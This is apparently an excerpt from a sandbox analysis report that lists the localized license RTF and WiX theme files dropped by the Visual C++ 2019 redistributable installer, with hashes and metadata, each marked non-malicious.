                                                                        SHA-512:FF1AE9C21DCFB018DD4EC82A6D43362CB8C591E21F45DD1C25955D83D328B57C8D454BBE33FBC73A70DADF1DFB3AE27502C9B3A8A3FF2DA97085CA0D9A68AB03
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instala.n. program [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Opravdu chcete akci zru.it?</String>.. <String Id="HelpHeader">N.pov.da nastaven.</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [adres..] . Nainstaluje, oprav., odinstaluje nebo.. vytvo.. .plnou m.stn. kopii svazku v adres..i. V.choz. mo.nost. je instalace...../passive | /quiet . Zobraz. minim.ln. u.ivatelsk. rozhran. bez v.zev nebo nezobraz. ..dn. u.ivatelsk. rozhran. a.. ..dn. v.zvy. V.choz. mo.nost. je zobrazen. u.ivatelsk.ho rozhran. a v.ech v.zev...../noresta

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1031\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11936
                                                                        Entropy (8bit):5.194264396634094
                                                                        Encrypted:false
                                                                        SSDEEP:192:+XkOmRUOl6WBsl4kA+sn+mvtI0qHl4qj+iPqk6kVV9iX9GzYNvQ8yOejIpRMrhC2:DDHMFPCeV3i4zOHyOejIpkC2
                                                                        MD5:C2CFA4CE43DFF1FCD200EDD2B1212F0A
                                                                        SHA1:E8286E843192802E5EBF1BE67AE30BCAD75AC4BB
                                                                        SHA-256:F861DB23B972FAAA54520558810387D742878947057CF853DC74E5F6432E6A1B
                                                                        SHA-512:6FDF02A2DC9EF10DD52404F19C300429E7EA40469F00A43CA627F3B7F3868D1724450F99C65B70B9B7B1F2E1FA9D62B8BE1833A8C5AA3CD31C940459F359F30B
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT-SOFTWARE-LIZENZBESTIMMUNGEN\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Diese Lizenzbestimmungen sind ein Vertrag zwischen Ihnen und der Microsoft Corporation (bzw. abh\'e4ngig von Ihrem Wohnsitz einem mit Microsoft verbundenen Unternehmen). Sie gelten f\'fcr die oben angef\'fchrte Software. Die Bestimmungen gelten ebenso f\'fcr jegliche von Microsoft angebotenen Dienste oder Updates f\'fcr die Software, sofern diesen keine anderen Bestimmungen beiliegen.\par..\b SOFERN SIE DIESE LIZENZBESTIMMUNGEN EINHALTEN, SIND SIE ZU FOLGENDEM BERECHTIGT:\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 RECHTE ZUR INSTALLATION UND NUTZUNG. \

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1031\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3379
                                                                        Entropy (8bit):5.094097800535488
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOZuesXJhDEVTORNxSMoZN3mteNSiNGNsZuiAXEqicMwhPXbhu9KwKlK8Kq:uDiTl3N7xSbu0N8+AhSNnm
                                                                        MD5:561F3F32DB2453647D1992D4D932E872
                                                                        SHA1:109548642FB7C5CC0159BEDDBCF7752B12B264C0
                                                                        SHA-256:8E0DCA6E085744BFCBFF46F7DCBCFA6FBD722DFA52013EE8CEEAF682D7509581
                                                                        SHA-512:CEF8C80BEF8F88208E0751305DF519C3D2F1C84351A71098DC73392EC06CB61A4ACA35182A0822CF6934E8EE42196E2BCFE810CC859965A9F6F393858A1242DF
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] - Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">M.chten Sie den Vorgang wirklich abbrechen?</String>.. <String Id="HelpHeader">Setup-Hilfe</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [Verzeichnis] - installiert, repariert, deinstalliert oder.. erstellt eine vollst.ndige lokale Kopie des Bundles im Verzeichnis. Installieren ist die Standardeinstellung...../passive | /quiet - zeigt eine minimale Benutzeroberfl.che ohne Eingabeaufforderungen oder keine.. Benutzeroberfl.che und keine Eingabeaufforderungen an. Standardm..ig werden die Benutzeroberfl.che und alle Eingab

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1036\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11593
                                                                        Entropy (8bit):5.106817099949188
                                                                        Encrypted:false
                                                                        SSDEEP:192:aRAbNYjVk+z5GUSLse5GgALEXmAWL+/3FEShP9sJgi8+Ra8woh+89EQdhwQPely6:K4yrPqm9LcVEg9sVp2ohHVdKoXJXci9a
                                                                        MD5:F0FF747B85B1088A317399B0E11D2101
                                                                        SHA1:F13902A39CEAE703A4713AC883D55CFEE5F1876C
                                                                        SHA-256:4D9B7F06BE847E9E135AB3373F381ED7A841E51631E3C2D16E5C40B535DA3BCF
                                                                        SHA-512:AA850F05571FFC361A764A14CA9C1A465E2646A8307DEEE0589852E6ACC61AF145AEF26B502835724D7245900F9F0D441451DD8C055404788CE64415F5B79506
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMES DU CONTRAT DE LICENCE LOGICIEL MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Les pr\'e9sents termes du contrat de licence constituent un contrat entre Microsoft Corporation (ou, en fonction de votre lieu de r\'e9sidence, l\rquote un de ses affili\'e9s) et vous. Ils s\rquote appliquent au logiciel vis\'e9 ci-dessus. Les termes s\rquote appliquent \'e9galement \'e0 tout service et \'e0 toute mise \'e0 jour Microsoft pour ce logiciel, \'e0 moins que d\rquote autres termes n\rquote accompagnent ces \'e9l\'e9ments.\par..\b SI VOUS VOUS CONFORMEZ AUX PR\'c9SENTS TERMES DU CONTRAT DE LICENCE, VOUS AVEZ LES DROITS CI-DESSOUS.\par....\pard{\pntext\f1\'B7\tab}{\*\pn\pnlvlblt\pnf1\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\s

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1036\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3366
                                                                        Entropy (8bit):5.0912204406356905
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO1BesgKLhD1K8cocDSN3m4NlN2ZfNmXL8ePZFcZkLPqUf9fQKRLKeKqZfj:uDiTlABzH1/qt4qgcXY
                                                                        MD5:7B46AE8698459830A0F9116BC27DE7DF
                                                                        SHA1:D9BB14D483B88996A591392AE03E245CAE19C6C3
                                                                        SHA-256:704DDF2E60C1F292BE95C7C79EE48FE8BA8534CEB7CCF9A9EA68B1AD788AE9D4
                                                                        SHA-512:FC536DFADBCD81B42F611AC996059A6264E36ECF72A4AEE7D1E37B87AEFED290CC5251C09B68ED0C8719F655B163AD0782ACD8CE6332ED4AB4046C12D8E6DBF6
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installation de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Voulez-vous vraiment annuler.?</String>.. <String Id="HelpHeader">Aide du programme d'installation</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installe, r.pare, d.sinstalle ou.. cr.e une copie locale compl.te du groupe dans le r.pertoire. Install est l'option par d.faut...../passive | /quiet - affiche une interface minimale, sans invite, ou n'affiche ni interface.. ni invite. Par d.faut, l'interface et toutes les invites sont affich.es...../norestart - supprime toutes les tentatives de red.

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1040\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11281
                                                                        Entropy (8bit):5.046489958240229
                                                                        Encrypted:false
                                                                        SSDEEP:192:WBGNX6UXR2+5SmgS/ChMErYkQvowHVw6zdgkycEGCDLQ+n3YJ2d8XSiej+T4Ma8f:gAzSVARBR5jEPLQY3YJpSjTP2
                                                                        MD5:9D98044BAC59684489C4CF66C3B34C85
                                                                        SHA1:36AAE7F10A19D336C725CAFC8583B26D1F5E2325
                                                                        SHA-256:A3F745C01DEA84CE746BA630814E68C7C592B965B048DDC4B1BBE1D6E533BE22
                                                                        SHA-512:D849BBB6C87C182CC98C4E2314C0829BB48BAD483D0CD97BF409E75457C3695049C3A8ADFE865E1ECBC989A910096D2C1CDF333705AAC4D22025DF91B355278E
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 CONTRATTO DI LICENZA PER IL SOFTWARE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Le presenti condizioni di licenza costituiscono il contratto tra Microsoft Corporation (o, in base al luogo di residenza del licenziatario, una delle sue consociate) e il licenziatario, Tali condizioni si applicano al software Microsoft di cui sopra. Le condizioni si applicano inoltre a qualsiasi servizio o aggiornamento di Microsoft relativo al software, a meno che questo non sia accompagnato da condizioni differenti.\par..\b QUALORA IL LICENZIATARIO SI ATTENGA ALLE PRESENTI CONDIZIONI DI LICENZA, DISPORR\'c0 DEI DIRITTI INDICATI DI SEGUITO.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\p

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1040\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3319
                                                                        Entropy (8bit):5.019774955491369
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO1eesy+hD9BOtBFv5Vo8BbQhMNDJN3msNlNohNNz+wcPclM+PAoYKp+K/u:uDiTlfQvo8WutJ/s9FHNOJp
                                                                        MD5:D90BC60FA15299925986A52861B8E5D5
                                                                        SHA1:FADFCA9AB91B1AB4BD7F76132F712357BD6DB760
                                                                        SHA-256:0C57F40CC2091554307AA8A7C35DD38E4596E9513E9EFAE00AC30498EF4E9BC2
                                                                        SHA-512:11764D0E9F286B5AA7B1A9601170833E462A93A1E569A032FCBA9879174305582BD42794D4131B83FBCFBF1CF868A8D5382B11A4BD21F0F7D9B2E87E3C708C3F
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installazione di [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Annullare?</String>.. <String Id="HelpHeader">Guida alla configurazione</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installa, ripara, disinstalla o.. crea una copia locale completa del bundle nella directory. L'opzione predefinita . Install...../passive | /quiet - visualizza un'interfaccia utente minima senza prompt oppure non visualizza alcuna interfaccia utente.. n. prompt. Per impostazione predefinita viene visualizzata l'intera interfaccia utente e tutti i prompt...../norestart - annulla quals

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1041\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):28232
                                                                        Entropy (8bit):3.7669201853275722
                                                                        Encrypted:false
                                                                        SSDEEP:192:Qkb65jNkzrUJVbpEiTskXHH1AZWoJxfnVnkDYUqfQFXBue6hX2JSfR7q05kWZxhY:epCD3y/ybox2yrk2
                                                                        MD5:8C49936EC4CF0F64CA2398191C462698
                                                                        SHA1:CC069FE8F8BC3B6EE2085A4EACF40DB26C842BAC
                                                                        SHA-256:7355367B7C48F1BBACC66DFFE1D4BF016C16156D020D4156F288C2B2207ED1C2
                                                                        SHA-512:4381147FF6707C3D31C5AE591F68BC61897811112CB507831EFF5E71DD281009400EDA3300E7D3EFDE3545B89BCB71F2036F776C6FDFC73B6B2B2B8FBC084499
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset128 MS Gothic;}{\f1\fnil\fcharset0 MS Gothic;}{\f2\fnil\fcharset134 SimSun;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9\'83\'7d\'83\'43\'83\'4e\'83\'8d\'83\'5c\'83\'74\'83\'67 \'83\'5c\'83\'74\'83\'67\'83\'45\'83\'46\'83\'41 \'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\par..\f1 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f0\'96\'7b\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\'82\'cd\f2\'a1\'a2\f1 Microsoft Corporation (\f0\'82\'dc\'82\'bd\'82\'cd\'82\'a8\'8b\'71\'97\'6c\'82\'cc\'8f\'8a\'8d\'dd\'92\'6e\'82\'c9\'89\'9e\'82\'b6\'82\'c4\'82\'cd\'82\'bb\'82\'cc\'8a\'d6\'98\'41\'89\'ef\'8e\'d0) \'82\'c6\'82\'a8\'8b\'71\'97\'6c\'82\'c6\'82\'cc\'8c\'5f\'96\'f1\'82\'f0\'8d\'5c\'90\'ac\'82\'b5\'82\'dc\'82\'b7\'81\'42\'96\'7b\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1041\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3959
                                                                        Entropy (8bit):5.955167044943003
                                                                        Encrypted:false
                                                                        SSDEEP:96:uDiTlDuB1n+RNmvFo6bnpojeTPk0R/vueX5OA17IHdGWz:5uB1+gD1DU4EdGE
                                                                        MD5:DC81ED54FD28FC6DB6F139C8DA1BDED6
                                                                        SHA1:9C719C32844F78AAE523ADB8EE42A54D019C2B05
                                                                        SHA-256:6B9BBF90D75CFA7D943F036C01602945FE2FA786C6173E22ACB7AFE18375C7EA
                                                                        SHA-512:FD759C42C7740EE9B42EA910D66B0FA3F813600FD29D074BB592E5E12F5EC09DB6B529680E54F7943821CEFE84CE155A151B89A355D99C25A920BF8F254AA008
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.. <Control Control="UninstallButton" X="270" Y="237" Width="120" Height="23"/>.. <Control Control="RepairButton" X="187" Y="237" Width="80" Height="23"/>.. .. <String Id="Caption">[WixBundleName] .......</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">..........</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ............ ......... .........................

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1042\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):27936
                                                                        Entropy (8bit):3.871317037004171
                                                                        Encrypted:false
                                                                        SSDEEP:384:kKIgbA2uBsarNG/HxPvCL1ewjxsXmEw4C7C7R4jAeqCBO968y7yNRylBSFfQv9yH:d3ar8Xa/XAeqoc0wfBB4qN
                                                                        MD5:184D94082717E684EAF081CEC3CBA4B1
                                                                        SHA1:960B9DA48F4CDDF29E78BBAE995B52204B26D51B
                                                                        SHA-256:A4C25DA9E3FBCED47464152C10538F16EE06D8E06BC62E1CF4808D293AA1AFA2
                                                                        SHA-512:E4016C0CA348299B5EF761F456E3B5AD9B99E5E100C07ACAB1369DFEC214E75AA88E9AD2A0952C0CC1B707E2732779E6E3810B3DA6C839F0181DC81E3560CBDA
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset129 Malgun Gothic;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 Microsoft \f1\'bc\'d2\'c7\'c1\'c6\'ae\'bf\'fe\'be\'ee\f0 \f1\'bb\'e7\'bf\'eb\'b1\'c7\f0 \f1\'b0\'e8\'be\'e0\'bc\'ad\f0\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f1\'ba\'bb\f0 \f1\'bb\'e7\'bf\'eb\'b1\'c7\f0 \f1\'b0\'e8\'be\'e0\'c0\'ba\f0 Microsoft Corporation(\f1\'b6\'c7\'b4\'c2\f0 \f1\'b0\'c5\'c1\'d6\f0 \f1\'c1\'f6\'bf\'aa\'bf\'a1\f0 \f1\'b5\'fb\'b6\'f3\f0 \f1\'b0\'e8\'bf\'ad\'bb\'e7\f0 \f1\'c1\'df\f0 \f1\'c7\'cf\'b3\'aa\f0 )\f1\'b0\'fa\f0 \f1\'b1\'cd\'c7\'cf\f0 \f1\'b0\'a3\'bf\'a1\f0 \f1\'c3\'bc\'b0\'e1\'b5\'c7\'b4\'c2\f0 \f1\'b0\'e8\'be\'e0\'c0\'d4\'b4\'cf\'b4\'d9\f0 . \f1\'ba\'bb\f0 \f1\'c1\'b6\'b0\'c7\'c0\'ba\f0 \f1\'c0\'a7\'bf\'a1\f0 \f1\'b8\'ed\'bd\'c3\'b5\'c8\f0 \f1

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1042\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3249
                                                                        Entropy (8bit):5.985100495461761
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO4TesKOwhDNJCkt1NhEN3m/NFNkbKNdExpVgUnqx6IPaRc0KoUK9TKz0KR:uDiTlUJJCsgqf6YVoz4uU5vI54U5TY
                                                                        MD5:B3399648C2F30930487F20B50378CEC1
                                                                        SHA1:CA7BDAB3BFEF89F6FA3C4AAF39A165D14069FC3D
                                                                        SHA-256:AD7608B87A7135F408ABF54A897A0F0920080F76013314B00D301D6264AE90B2
                                                                        SHA-512:C5B0ECF11F6DADF2E68BC3AA29CC8B24C0158DAE61FE488042D1105341773166C9EBABE43B2AF691AD4D4B458BF4A4BF9689C5722C536439CA3CDC84C0825965
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] .. ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">.. ...</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ..... ... .. .. .... .., .., .. .... ...... ... .........../passive | /quiet - .... .. .. UI. ..... UI ... ..... .... ..... ..... UI. .. ..... ........../norestart - .. .... .. .... ...

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1045\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13265
                                                                        Entropy (8bit):5.358483628484379
                                                                        Encrypted:false
                                                                        SSDEEP:192:TKpWRd0NE41Y/od7V/sHFos7YLQY9DbLM5D+Vw1VAOb0P4/sHLS7VHwHMPw95a+Q:uy0CG9KZ7qQCw1VAOZ/sHOJfcY2wf6p2
                                                                        MD5:5B9DF97FC98938BF2936437430E31ECA
                                                                        SHA1:AB1DA8FECDF85CF487709774033F5B4B79DFF8DE
                                                                        SHA-256:8CB5EB330AA07ACCD6D1C8961F715F66A4F3D69FB291765F8D9F1850105AF617
                                                                        SHA-512:4EF61A484DF85C487BE326AB4F95870813B9D0644DF788CE22D3BEB6E062CDF80732CB0B77FCDA5D4C951A0D67AECF8F5DCD94EA6FA028CFCA11D85AA97714E3
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 POSTANOWIENIA LICENCYJNE DOTYCZ\f1\'a5CE OPROGRAMOWANIA\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Niniejsze postanowienia licencyjne stanowi\f1\'b9 umow\'ea mi\'eadzy Microsoft Corporation (lub, w\~zale\'bfno\'9cci od miejsca zamieszkania Licencjobiorcy, jednym z\~podmiot\f0\'f3w stowarzyszonych Microsoft Corporation) a\~Licencjobiorc\f1\'b9. Maj\'b9 one zastosowanie do wskazanego powy\'bfej oprogramowania. Niniejsze postanowienia maj\'b9 r\f0\'f3wnie\f1\'bf zastosowanie do wszelkich us\'b3ug i aktualizacji Microsoft dla niniejszego oprogramowania, z wyj\'b9tkiem tych, kt\f0\'f3rym towarzysz\f1\'b9 inne postanowienia.\par..\b\

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1045\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3212
                                                                        Entropy (8bit):5.268378763359481
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOPesar4hDo7zGriQjDCN3mDNN0NrsNGl3vxkIP2hUdKLK0KbK4n6W0sfNM:uDiTlusPGriQw8n2rOij4JsU
                                                                        MD5:15172EAF5C2C2E2B008DE04A250A62A1
                                                                        SHA1:ED60F870C473EE87DF39D1584880D964796E6888
                                                                        SHA-256:440B309FCDF61FFC03B269FE3815C60CB52C6AE3FC6ACAD14EAC04D057B6D6EA
                                                                        SHA-512:48AA89CF4A0B64FF4DCB82E372A01DFF423C12111D35A4D27B6D8DD793FFDE130E0037AB5E4477818A0939F61F7DB25295E4271B8B03F209D8F498169B1F9BAE
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalator [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Czy na pewno chcesz anulowa.?</String>.. <String Id="HelpHeader">Instalator . Pomoc</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [katalog] - Instaluje, naprawia, odinstalowuje.. lub tworzy pe.n. lokaln. kopi. pakietu w katalogu. Domy.lnie jest u.ywany prze..cznik install...../passive | /quiet - Wy.wietla ograniczony interfejs u.ytkownika bez monit.w albo nie wy.wietla ani interfejsu u.ytkownika,.. ani monit.w. Domy.lnie jest wy.wietlany interfejs u.ytkownika oraz wszystkie monity...../norestart - Pom

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1046\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10656
                                                                        Entropy (8bit):5.092962528947159
                                                                        Encrypted:false
                                                                        SSDEEP:192:WIPAufWXXF0+YkR6E0/CiTS0CsGlHIMqf29H7KxLY/aYzApT3anawLXCBX2:VPAufb+YSSCYrCb5BmW4UDaTqzLwX2
                                                                        MD5:360FC4A7FFCDB915A7CF440221AFAD36
                                                                        SHA1:009F36BBDAD5B9972E8069E53855FC656EA05800
                                                                        SHA-256:9BF79B54F4D62BE501FF53EEDEB18683052A4AE38FF411750A764B3A59077F52
                                                                        SHA-512:9550A99641F194BB504A76DE011D07C1183EE1D83371EE49782FC3D05BF779415630450174DD0C03CB182A5575F6515012337B899E2D084203717D9F110A6FFE
                                                                        Malicious:false
